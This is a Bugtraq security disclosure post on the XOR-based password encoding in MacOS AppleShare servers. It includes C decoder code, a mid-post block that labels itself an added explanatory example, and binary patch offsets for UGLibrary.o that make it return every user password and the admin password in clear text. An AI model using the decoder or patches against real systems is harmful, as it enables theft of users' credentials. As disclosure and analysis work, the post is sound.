Bugtraq mailing list archives

MacOS system encryption algorithm 3


From: spd () GTC1 CPS UNIZAR ES (J.A. Gutierrez)
Date: Tue, 14 Sep 1999 22:10:54 +0200


    Some time ago, Dawid adix Adamski <adixx () FRIKO4 ONET PL> sent to
    bugtraq the encryption algorithm he found in the MacOS personal
    AppleShare server.

    I have been researching this subject a little, and I've found that
    his code fails when decoding the first character of the password;
    for this char you need additional data from the "Users & Groups
    Data File", specifically the 4th byte after the encoded sequence
    described in his message.

    So, after cleaning up the code a little, you get something as simple
    as this:

---------------------------------------------------------------------------
#include <stdio.h>

int main(void)
{
    int i;

    /* constant mask; it is the same on every system */
    const unsigned char *mask = (const unsigned char *)"rpcgtprk";
    /* the 8 encoded bytes followed by the next 4 bytes from the data
       file; the last one (pw[11]) is needed for the first character.
       A writable array, not a string literal pointer, since we modify it */
    unsigned char pw[] = "\x28\x08\x2F\x3B\x20\x36\x30\x5B\x00\x00\x00\x09";
    unsigned char c;

    /* characters 7..1: each is the stored byte XOR the previous stored
       byte XOR the mask byte at the same position */
    for (i = 0; i < 7; i++) {
        c = pw[6-i] ^ mask[7-i];
        pw[7-i] ^= c;
    }
    /* character 0: chained with the extra byte instead of a previous one */
    c = pw[11] ^ mask[7-i];
    pw[7-i] ^= c;

    printf("\"%s\"\n", pw);   /* prints "SPDsoft" for this sample */
    return 0;
}
---------------------------------------------------------------------------
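    The loop above, read as a formula, says that stored byte j is the
    plaintext byte XORed with stored byte j-1 and a constant mask byte,
    with the byte found 4 positions after the field standing in for
    "stored byte -1". The following is an added example, not code from
    the post or from Apple's UGLibrary: it writes that chain out as an
    encode/decode pair (ug_encode, ug_decode and the helper names are my
    own, not SDK names) and checks the round trip on the post's sample
    bytes. The point for anyone auditing credential storage is that the
    mask never varies and the chaining byte sits in the clear next to the
    field, so the format is reversible obfuscation rather than a one-way
    hash: whoever can read the file can recover every password.

```c
#include <stdio.h>
#include <string.h>

/* Constant mask taken from the post; identical on every system, so it is
   not a key in any meaningful sense. */
static const unsigned char UG_MASK[8] = { 'r','p','c','g','t','p','r','k' };

/* Encode an 8-byte, NUL-padded password field. Each stored byte is the
   plaintext byte XORed with the previous stored byte and the mask byte at
   the same position; the first byte is chained with `iv`, the byte the post
   says sits 4 bytes after the field (assumption: it is stored in the clear). */
void ug_encode(const unsigned char plain[8], unsigned char iv, unsigned char enc[8])
{
    unsigned char prev = iv;
    for (int j = 0; j < 8; j++) {
        enc[j] = plain[j] ^ prev ^ UG_MASK[j];
        prev = enc[j];
    }
}

/* Inverse of ug_encode: the same chain walked forward over the stored bytes.
   Equivalent to the post's loop, which walks it from the last byte down. */
void ug_decode(const unsigned char enc[8], unsigned char iv, unsigned char plain[9])
{
    unsigned char prev = iv;
    for (int j = 0; j < 8; j++) {
        plain[j] = enc[j] ^ prev ^ UG_MASK[j];
        prev = enc[j];
    }
    plain[8] = '\0';                /* field is NUL-padded; make it a C string */
}

/* The 8-byte field and trailing chaining byte from the post's own sample. */
static const unsigned char SAMPLE_ENC[8] = { 0x28,0x08,0x2F,0x3B,0x20,0x36,0x30,0x5B };
static const unsigned char SAMPLE_IV = 0x09;

/* Decode the post's sample; returns a pointer to a static buffer. */
const char *ug_decode_sample(void)
{
    static unsigned char out[9];
    ug_decode(SAMPLE_ENC, SAMPLE_IV, out);
    return (const char *)out;
}

/* Round trip: re-encoding the recovered plaintext with the same chaining
   byte must reproduce the stored bytes exactly, which confirms the chain is
   fully invertible with nothing secret involved. Returns 1 on success. */
int ug_roundtrip_ok(void)
{
    unsigned char plain[9], enc[8];
    ug_decode(SAMPLE_ENC, SAMPLE_IV, plain);
    ug_encode(plain, SAMPLE_IV, enc);
    return memcmp(enc, SAMPLE_ENC, 8) == 0;
}

int main(void)
{
    printf("decoded: \"%s\"\n", ug_decode_sample());
    printf("round trip: %s\n", ug_roundtrip_ok() ? "ok" : "mismatch");
    return 0;
}
```

    Because the plaintext is NUL-padded and the chain is one XOR per
    byte, a flipped bit in the stored field flips exactly the same bit in
    the decoded character and nothing else, which is the other property
    that separates this kind of scheme from real encryption or hashing.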

    But you still have to find the encrypted passwords in the binary
    data file.

    Apple's AppleShare SDK provides a "UGLibrary" to deal with this
    data file, but it doesn't let you access the user password (which
    is decrypted on the stack when you call "UGAuthenticateUser()"),
    nor the encrypted one.

    In fact, in this call, the encrypted password is decrypted onto the
    stack and compared against the user-supplied one.
    So all we have to do is replace the compare with a copy:

* 00000206: B036 70F4      '.6p.'   CMP.B      -$0C(A6,D7.W),D0
* 0000020A: 6710           'g.'     BEQ.S      *+$0012             ; 0000021C
*
    is replaced with
*
* # ADDQ.W      #$02,A2             544A
* # MOVE.B      D0,-(A2)            1500
* # BRA.S       *+$0012             6010
*
* i.e., go to offset 28A0 and replace "B036 70F4 6710" with "544A 1500 6010"
* in "UGLibrary.o"

    After that, we can build a simple program (about 150 lines) and,
    with just a double click, get a listing of all the users and
    decoded passwords in the system.

    That's enough for the personal AppleShare server included with
    MacOS 7.x and 8.x; for AppleShare server 3.x (and probably 4.x;
    I didn't check it) the data file is protected by an "administrator
    password", so you need it before being able to use the modified
    UGAuthenticateUser().
    But that password uses the same encryption algorithm/check as
    the users' ones, so we only have to change "UGOpenFile()" in the
    same way:
    at offset 0A92, B030 7000 671A becomes 544A 1500 601A

    So, with these modifications, the AppleShare 3.x admin password
    is returned in filePB.ugAdminKey after UGOpenFile() and the
    users' passwords are returned in userPB.ugPassword after
    UGAuthenticateUser(), both in plain text.

    A program which uses this method for listing users and passwords
    can be found (both MacOS 68k binary and source code) at
    ftp://ivo.cps.unizar.es/pub/SPDsoft/ASPID.sit
    (Stuffit 5.x archive)

--
finger spd () gtc1 cps unizar es for PGP       /              So be easy and free
.mailcap tip of the day:                   /      when you're drinking with me
application/ms-tnef; cat '%s' > /dev/null / I'm a man you don't meet every day
text/x-vcard; cat '%s' > /dev/null       /            (the pogues)
